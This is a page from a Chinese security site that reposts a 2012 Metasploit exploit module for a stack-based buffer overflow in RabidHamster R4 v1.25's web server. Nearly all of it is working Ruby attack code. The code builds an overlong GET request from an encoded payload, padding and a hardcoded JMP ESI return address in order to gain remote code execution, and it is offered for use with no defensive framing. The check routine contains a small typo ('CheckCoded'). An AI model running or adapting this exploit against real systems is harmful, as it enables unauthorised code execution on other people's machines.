首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RabidHamster R4 Log Entry sprintf() Buffer Overflow
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-05-28  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info={})
  super(update_info(info,
   'Name'           => "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
   'Description'    => %q{
     This module exploits a vulnerability found in RabidHamster R4's web server.
    By supplying a malformed HTTP request, it is possible to trigger a stack-based
    buffer overflow when generating a log, which may result in arbitrary code
    execution under the context of the user.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Luigi Auriemma',  #Discovery, PoC
     'sinn3r'           #Metasploit
    ],
   'References'     =>
    [
     ['OSVDB', '79007'],
     ['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'],
     ['URL', 'http://secunia.com/advisories/47901/']
    ],
   'Payload'        =>
    {
     'StackAdjustment' => -3500,
     'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20"
    },
   'DefaultOptions'  =>
    {
     'ExitFunction' => "process"
    },
   'Platform'       => 'win',
   'Targets'        =>
    [
     ['R4 v1.25', {'Ret'=>0x73790533}]  #JMP ESI (ddraw.dll)
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Feb 09 2012",
   'DefaultTarget'  => 0))

   register_options(
    [
     OptPort.new('RPORT', [true, 'The remote port', 8888])
    ], self.class)
 end

 def check
  res = send_request_cgi({
   'method' => 'GET',
   'uri'    => '/'
  })

  if res and res.headers['Server'] == 'R4 Embedded Server'
   return Exploit::CheckCode::Detected
  else
   return Exploit::CheckCoded::Safe
  end
 end

 def exploit
  buf = ''
  buf << payload.encoded
  buf << rand_text_alpha(2022-buf.length, payload_badchars)
  buf << [target.ret].pack("V*")
  buf << pattern_create(200)
  buf << rand_text_alpha(3000-buf.length, payload_badchars)

  send_request_cgi({
   'method' => 'GET',
   'uri'    => "/?#{buf}"
  })
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·bsnes v0.87 Local Denial Of Se
·Symantec Web Gateway 5.0.2 Rem
·appRain CMF Arbitrary PHP File
·QuickShare File Share 1.2.1 Di
·OpenOffice OLE Importer Docume
·WeBid converter.php Remote PHP
·Tftpd32 DHCP Server Denial Of
·b2ePMS 1.0 multiple SQLi Vulne
·Symantec End Point Protection
·iOS 5.1.1 Safari Browser Denia
·LibreOffice 3.5.3 .rtf FileOpe
·Novell Client 4.91 SP4 Privile
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved